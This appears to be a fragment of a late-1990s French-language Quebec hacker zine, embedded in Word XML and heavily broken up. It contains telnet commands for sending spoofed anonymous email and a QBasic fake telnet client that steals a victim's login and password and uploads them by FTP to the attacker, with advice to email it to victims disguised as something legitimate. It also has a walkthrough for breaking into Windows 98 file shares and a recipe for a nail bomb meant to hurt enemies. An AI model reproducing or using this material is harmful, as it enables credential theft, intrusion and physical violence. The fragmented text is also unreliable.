        <w:t>Service de session NetBios. C'est sur ce port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que les lamerZ utilisent leurs nu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3</w:t>
        <w:tab/>
        <w:t>IMAP</w:t>
        <w:tab/>
        <w:t xml:space="preserve">un autre de service de e-mail peu utilisé car </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>répu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pas tres fi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e pense qu'il y a là une liste des ports les plus impor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crois, que le port pour IRC est le 6667 mais je n'en sis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car je n'ai jamais essayé. Mais si tel est le cas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rez alors discuter avec nous sur #Hellbc grace à votre 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 Comment envoyer un mail "anonyme" grace au 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t d'abord il faut ouvrir votre logiciel de telnet : a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s dos, ou bien lancez un terminal (sous linux), puis voic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commandes à taper ("&gt;" signale une nouvelle l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Telnet www.un_serveur_mail.com 25&gt; HELO ServeurAnonymou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MAIL FROM: FauxNick@ninportekoi.com&gt; RCPT TO: UnLamer@UnServer.com&gt; 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subject: Test For Hellbc  CeCi est Un mail anonyme&gt; .&gt; Q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arques :    Certains serveurs note l'adresse IP, alors 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ut mieux passer par une passerelle pour pas se faire chopp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plus je vous conseil d'essayer sur vous avant, histoir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 se faire griller comme Un Gros cave :))). Enfin, ne pas oublier l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 signale la fin du message.IV) Comment hacker les comptes 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eine [ALIENS] me demanda d'écrire un article sur le Telnet,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découvris 5 minutes plus tard une nouvelle (?) technique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cker les comptes telnet, alors qe je chattai sous IRC : pwheheh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ca fait 3 ans chu sous Irc hehe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rsque vous vous connectez en telnet sur un site, il arr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fois ( meme souvent ! )que l'on vous demande un LOGIN et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SWORD. Rare sont ceux qui les possedent ... C'est pourquo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vous propose un programme en QBasic dont le source m'a é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voyé par DCC. Le voici :-------&amp; cute_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Générateur Aléatoire] Randomize Timer rem [Infos sur le compte FTP] c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put "Veuillez rentrer l'adresse de votre serveur Telnet ";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put "Veuillez rentrer votre Login "; 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put "Veuillez rentrer votre Password "; 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Création d'un nom aléatoire de fichier] For X = 1 To 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 = F$ + Chr$(65 + Int(Rnd * 26)) Ne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Création d'un nom aléatoire de fichier] For X = 1 To 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 = G$ + Chr$(65 + Int(Rnd * 26)) Ne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Création d'un nom aléatoire pour le fichier Batch (*.bat)] For X = 1 To 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 = B$ + Chr$(65 + Int(Rnd * 26)) Ne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Enregistrement des infos du compte dans un fi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en "C:\" + F$ For Output As #1 Print #1, A$ Print #1, N$ Print #1, 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se #1 cls print "Connect to " + A$ rem [Enregistrement des commandes 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en "C:\" + G$ For Output As #1 Print #1, "open www.exempl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1, "quote user billou" Print #1, "quote pass a7n3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1, "put C:\" + F$ + " x" + F$ Print #1, "close" Close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Enregistrement des commandes dans le fichier ba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en "C:\windows\" + B$ + ".bat" For Output As #1 Print #1, "@echo o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1, "C:\windows\ftp -v -n -s:C:\" + G$ Print #1, "c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1, "del C:\" + F$ Print #1, "del C:\" + G$ Print #1, "cls" Close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Démarrage du fichier de commandes (Ba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ll "C:\windows\" + B$ + ".bat" Shell "del C:\windows\" + B$ + ".b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 [Fin de la procédure et erreur simulée] c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Error (520) FTP Connexion failed" boucle: goto bou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p; cute_her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tte technique demande très peu de connaissances. Pour qu'el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che, elle demande que l'utilisateur en face ne soit pas tr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udent, donc inutile de tester le NASA :).Voici comment n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ons procéder : Nous voulons obtenir le Login et le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n compte TelNet. Pour cela, nous allons bricoler un logici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net bidon. J'entends par logiciel Telnet bidon : un logici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yant l'apparence d'un client Telnet mais qui n'en est pas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notre logiciel telnet bidon demandera à l'utilisateu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m du serveur sur lequel est son compte, son Login et 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sword. Ensuite, il enregistrera ces infos dans un fichier.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is les infos enregistrées, le programme devra nous les envo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rectement. Et voila ! A présent, Il nous suffit d'a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lever les fichiers qui contiennent les accè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TUCE : pour la fileer facilement, envoyez la à la victime p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mail, en la faisant passer pour un message de pro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riten By ]SoulFl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coolsnake_2000@yahoo.co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Faille de sécurité des réseaux windows 98, par Eille-l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tte faille provien de l'option : partage des lecteurs et impriman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ésultat : Control total des des disque et imprimante partagé par le systeme dis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 qu'il vous fo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 une victimes et son IP (si vous ete un lamer vous détruiré probab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ut lé fichier vu sur son dis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 Une fenetre de DOS dans le repertoir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 Une connection int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ce truc peu etre bon pour infiltré les réseau win98, mais normalement, toute compan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rieuse optera pour un réseau novell ou autre mieu sécurisé... donc pas vraiment de chanc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ouvé une mine d'or en information confidentiel avec ce truc. Premierement, trouvé une pers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ec un résau win98... puis trouvé son IP... juske la c'est très facile est tout le reste l'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ssi. Une foi que vous avé son IP (copier de préferance) rendé vous sur votre fenetre de D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le repertoire /windows/ et tap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t view \\collé ladresse ici   vous auré une réponse qui va resemblé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m de partage        Type         Comment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TRE                     Disque       &lt;-- autre - nom du du disk partag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KETTE                Disque       &lt;--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LOAD STUFF       Dis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PSON                       Impr.          &lt;--EPSON - nom du printer partag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_24X                        Dis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VEUR                 Dis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RD DRIVE           Dis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écution achev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vous avé une réponse qui resemble a ceci, vous etes sur la bonne voie. Une foie cette com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te, allé sur votre bureau, par un click de droit sur votre icône de voisinage réseau all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 " se conecté a un lecteur réseau " tapé \\ IP de la personne\nom du lecteur partagé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là! Allé dans votre poste de travail pour entré sur son disk mainteant partagé juska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BLEME FRÉQUENT : liseur de zines : criss jai la liste de lecteur partagé mais je peu pas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ecté a eux parce que je né pas voisinage réseau! Que faire!?! Hehe pas de trouble mais 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 faud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 le cd de ta version de windows install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 rien dau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va dans le pannau de configuration, réseau, puis partage des imprimante et lec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che les 2 cases ou au choie.. fait OK .Puis sa va sinstallé a partir du CD . un reboot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s pres a t'intrusionné sul réseau du g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pire hein? tk cé deja mieu que le netbussage a mar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eille-la'1999----------</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Bombes qui font mal en asti, par Dukest4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Ok la j'sais que vous etes ecoeurer d'entendre parler de bombe pi</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toute mais la cer pour une bonne cause fauit j'vous compte ca!!</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J'ai tester une bombe a'c mon friend pi j'te jure cer tueur en asti!!</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Ingredient necessair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Petrole (ou alcool... comme tu veut)</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Des Clous... quand meme long clou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Une guenille ou wathever qui peut servir de meches... mais assez long</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un pot en plastiqu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ok fous les clou pi l'gaz dans les pot en plastique pi trempe le ling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dans l'gaz pour qu'y fasse bien sa job de meche... pi laisse en un</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boute tremper dans l'gaz pi eloigne toi en criss pi alume moi ca!</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J'te jure mon homme tasse toi en SACREMENT!!! Les clous pour</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te dire, yont traversé un baril d'un bord a l'autre dans mon champ</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a 5 metres de d'la... yont planter raide dans des asti d'planche de</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bois hyper epaisse tsé... sa d'lair innocent comme recettes mai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j'te jure que tes ennemis y vont en baver a'c ca!!! heheh!</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Bonne chance pi essaye d'en tuer l'moins possible a fois!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lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Dukest4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 d'avoir lu le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Zine #7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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Zine #8 devrais suivre assez bientot! :) Garder un oe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nous pour plus de nouvelles... Allez sur #QHA (und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sur www.qharulez.com comme vous preféré :)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a proch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bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>QHA, Québec Hacker's Alliance - http//www.qharulez.co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